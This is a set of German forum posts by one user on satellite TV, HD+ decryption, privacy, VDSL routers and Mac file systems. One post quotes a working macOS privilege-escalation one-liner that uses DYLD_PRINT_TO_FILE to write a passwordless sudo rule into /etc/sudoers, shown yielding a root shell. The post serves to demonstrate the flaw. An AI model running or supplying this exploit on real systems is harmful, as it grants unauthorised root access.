Posts by halbfertiger

    Weiss jemand ob es eine funktionierende Lösung gibt um gleichzeitig mehrere Programme (ich habe vier DVB S2 tuner von Digital Devices) via einem CI Interface und HD+ Modul plus Karte (SKY) zu entschlüsseln.


    Die meißten Teilnehmer hier wissen, dass es dafür keine legale Lösung gibt, das sieht HD+ nicht vor. Ein HD+ Modul funktioniert nicht und wird auch nicht mit VDR funktionieren.


    Quote

    Ich weiss, dass viele auf opensource CAM setzten


    Solche Lösungen sind illegal und werden deshalb laut Forenregeln hier nicht diskutiert.

    Egal was STR und SNR anzeigen, wirklich wichtig ist UNC. Wenn dieser Wert größer als "0" ist hast du in dem Moment Klötzchen, je höher der Wert desto stärker. Was bei STR und SNR angezeigt wird hängt vom Treiber der DVB-Karte ab, es gibt Karten da wird dort nichts angezeigt und trotdem ist das Bild störungsfrei.

    Diese Einheit von Megasat hat aber den Nachteil, dass sie sich schlecht für den festen Aufbau auf Wohnmobile oder Campinganhänger eignet, da sie sich nicht zudsammanklappen lässt und eine feste Höhe von ca. 0,5 m hat. Da gibt es bessere Modelle, die sich automatisch ausklappen lassen und zusammengeklappt weniger als die Hälfte der Höhe haben.

    Ich versuche einfach so wenig wie möglich verknüpfbare Spuren von mir bzw. meiner Familie im Internet zu hinterlassen.


    Löblich, versuche ich genau so.
    Bei Eingabe meines Realnamens bei google werden (zumindest auf Seite 1-20, mehr zu kontrollieren hatte ich keine Lust) nur 2 Stellen gefunden die wirklich mit mir was zu tun haben, eine davon hängt mit meinem Arbeitgeber zusammen.


    Quote

    Nennt es Paranoia, aber von meiner Tochter braucht niemand (bis auf ihre persönlichen Bekannten) den Namen, Alter, Geschlecht, Wohnort o.ä. zu kennen.


    Dann solltest du ihr kein Smartphone geben, denn genau das wird sie mit dem Ding machen, dafür sind die in den Augen 12jähriger Mädchen schließlich da. Und noch nicht mal du schaffst es Alter und Geschlecht deines Kindes im Internet nicht zu verraten. ;-)

    Direkt aus Twitter unter OS X 10.10.4 und Firefox herauskopiert:

    Code
    1. Mini:~ test$ echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
    2. bash-3.2#


    "test" als neuer Standardbenutzer ohne Adminrechte eingerichtet.

    Nur gleich mit Sanktionen zu drohen ist schon heftig.


    Haben sie doch nicht.
    Sie haben leidglich auf Reaktionen Ihrerseits hingewiesen für den Fall dass von Seiten des Kunden nichts unternommen wird, das ist purer Selbstschutz. Oder meinst du die haben Spaß daran, dass ganze Adressbereiche von ihnen auf Blacklists landen und sie dann ein erhöhtes Supporthotline-Aufkommen haben? Leute die ihre Rechner infizieren und sich nicht selbst helfen können lernen es sonst nie. Ich könnte mir auch vorstellen, dass entsprechende Passagen in den AGB oder Vertragstexten stehen, aber wer liest die schon?


    Dein Fehler war übrigens den Rechner online gehen zu lassen. Solche Rechner werden zuerst mittels einer Rettungs-CD (z. B. aktuellem c't-Desinfect) gebootet und damit auf Befall überprüft. Wenn dabei etwas festgestellt wird, Sicherung der persönlichen Daten und das System grundsätzlich platt machen und aus sicherer Quelle neu installieren. Vorher erhält ein solcher Rechner keinen Netzwerkzugriff mittels eigenem Betriebssystem.

    Ich hab da mal ne kurze Zwischenfrage, in meiner Firma habe ich einen ISDN Anschluß an dem ich eine Telefonanlage (Eumex 312) betreibe, wie sieht das denn aus, wenn die TK den Anschluß auf VoIP umstellt bzw. was mache ich da?


    Hinter einer Firtzbox 7490 könntest du die alte Telefonanlage weiter betreiben oder, wenn du keine Systemtelefone oder mehr als 2 einfache analoge Telefone einsetzt, diese Aufgabe der Fritzbox übergeben und die Eumex ausmustern.

    Der Router und VOIP sind nicht das Problem, dafür gibt es bewährte Software. IPTV an geeignete Geräte weiterleiten ist auch kein Problem, klar dass es keine freien Geräte geben kann die das gesamte Entertain anzeigen können. Das Problem ist das DSL-Modem, das muss man fertig kaufen und da ist für VDSL mit Vectoring die Auswahl nicht groß.

    Sollte ich jetzt schon eine Vector-Firmware einspielen oder erst nach dem Update der Telekom?


    Zumindest solltest du so schnell wie möglich alle verfügbaren Dateien für den Router ;-). Ich würde jetzt schon probehalber die Versionen mit Vectoring installieren.


    Quote

    Und ist es dann für Telekom VDSL Vector1 oder Vector2 ?


    Das weiß wohl selbst Draytek nicht, deshalb steht im Text auch dass du es ausprobieren sollst.

    Aufgrund der Hochwertig verarbeiteten Hardware habe ich schon mal überlegt mir ein Apple- Gerät zu kaufen. Aber genau solche Sachen schrecken mich ab


    Aber Windows legen sich Leute zu (du auch?), obwohl es weder ext3, ext4 noch HFS(+) beherrscht.
    Das "Gefrickel" beschränkt sich übrigens auf die von jedem DAU beherrschbare Installation von:
    http://www.heise.de/download/o…use-for-os-x-1184699.html
    und
    http://www.heise.de/download/ntfs-3g-for-mac-os-x.html


    Und die letzten USB-Festplatten die ich in Betrieb genommen habe waren vom Hersteller mit exFAT formatiert. Das halte ich für universeller und sinnvoller als NTFS.

    Natürlich wird die Telekom nur ihre eigenen Geräte auf Nachfrage nennen. Hat man aber eine konkrete Fritzbox, sagen sie einem aber ob diese geeignet ist.


    Bist du dir sicher?
    Ich würde da eher bei AVM anfragen. Auch wenn es für die 7570 keinen individuellen Support mehr gibt, könnte ich mir eine Antwort für den Grund des Briefes der Telekom von AVM vorstellen.


    Es bleibt aber weiterhin auffällig, dass die Signalstärke bei allen dritten Programmen deutlich schwächer ist als bei den übrigen Programmen. Auf dem Transponder NDR liegen ja durchaus auch noch Das Erste, arte, tagesschau24 usw. Und die haben ein besseres Signal.




    Die Transponder können durchaus von unterschiedlichen Senderstandorten kommen, so wie es auch bei dir der Fall ist.
    570 MHz (Das Erste) kommt vom Hamburger Heinrich-Hertz-Turm
    530 MHz (die Dritten) kommen aus Hamburg-Moorfleet


    http://www.ueberallfernsehen.de/dvbtdownloads127.pdf